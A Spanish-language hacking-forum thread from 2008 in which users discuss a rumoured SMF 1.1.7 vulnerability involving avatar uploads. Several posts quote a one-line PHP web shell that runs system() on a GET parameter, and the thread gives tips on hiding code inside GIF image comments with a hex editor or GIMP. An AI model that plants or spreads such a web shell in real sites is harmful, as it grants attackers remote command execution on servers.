[Duda] Existe o no el Bug SMF 1.1.7

Iniciado por Dacan, 24 Diciembre 2008, 01:11 AM

0 Miembros y 1 Visitante están viendo este tema.

Dacan

Googleando he encontrado 2 temas en el foro oficial de SMF de que presuntamente hay un bug en la version 1.1.7 aunque no se cual de los 2 caminos es uno apunta a los perfiles y avatares y otro a un ataque sql injeccion.

Que Saben del tema, que pueden aportar??

Saludos, Dacan  :D

WHK

Eso de la falla de los avatares y perfiles está unos post mas abajo:
http://foro.elhacker.net/bugs_y_exploits/smf_116_multiples_fallas-t234159.0.html

Pero eso es para 1.1.6 no para la última, si se hubiera publicado alguna ya lo hubieran actualizado asi que veo muy poco probable que haya alguno (por lo menos público).

Dacan

Español:
http://www.simplemachines.org/community/index.php?topic=280086.0
http://www.simplemachines.org/community/index.php?topic=278740.0

Ingles:
http://www.simplemachines.org/community/index.php?topic=279068.0

Según los temas pueden ser 2 caminos hacia el bug ademas como pusieron este código en un archivo gif ya que si lo intentas SMF dice que tu archivo excede el tamaño permitido.

<? if(isset($_GET[cmd])) system($_GET[cmd]) ?>

Saludos, Dacan  :D



AlbertoBSD

#3
Bueno, segun lei los Post ahi en simplemachines, Ocupas 2 cosas tener system activado en el PHP y ademas poder subir Avatars al foro.

Saludos.
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

Dacan

Cita de: Anon en 24 Diciembre 2008, 17:22 PM
Bueno, segun lei los Post ahi en simplemachines, Ocupas 2 cosas tener system activado en el PHP y ademas poder subir Avatars al foro.

Saludos.

Si pero como puedes poner código PHP en un gif, antes había visto un tutorial que explicaba como inyectar código PHP en los comentarios de un imagen pero eran del formato .jpg

Saludos, Dacan  :D

AlbertoBSD

Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

Dacan

Me podrías dar un ejemplo lo leí y luego lo traduje lo que que intendi fue que se puede poner código javascript en una imagen  agregando = 1 y "/*" and "*/".

Osea abro una imagen .gif con bloc de notas y donde pongo el =1 y los comentarios y en que parte el código javascript ejemplo de redireccion.

Saludos, Dacan  :D

AlbertoBSD

Que tal Dacan, no es con el notepad de windows ocupas algun editor especial tipo hexadecimal para que no pierdas datos el gif, hay programas graficos como el gimp u otros que te permiten agregar comentarios.

Saludos.
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

shimpei

disculpen mi ignorancia sobre rfi pero en los casos en los que se utilizarian
<?php system($_GET[cmd]); ?>
o
<? if(isset($_GET[cmd])) system($_GET[cmd]) ?>
serian si el server donde esta alojado corre bajo windows no? si es un unix tambien funcionaria?
DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.soportedsr.ar.gd


AlbertoBSD

Hola que tal, sobre tu duda

Cita de: shimpei en 25 Diciembre 2008, 00:54 AM
disculpen mi ignorancia sobre rfi pero en los casos en los que se utilizarian
<?php system($_GET[cmd]); ?>
o
<? if(isset($_GET[cmd])) system($_GET[cmd]) ?>
serian si el server donde esta alojado corre bajo windows no? si es un unix tambien funcionaria?

Las funciones son propias de PHP no importa el sistema, siempre y cuando esten activadas dichas funciones. la de isset es obvio que va a estar, pero la de system() puede ser que este bloqueada o restringida.

Saludos.
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW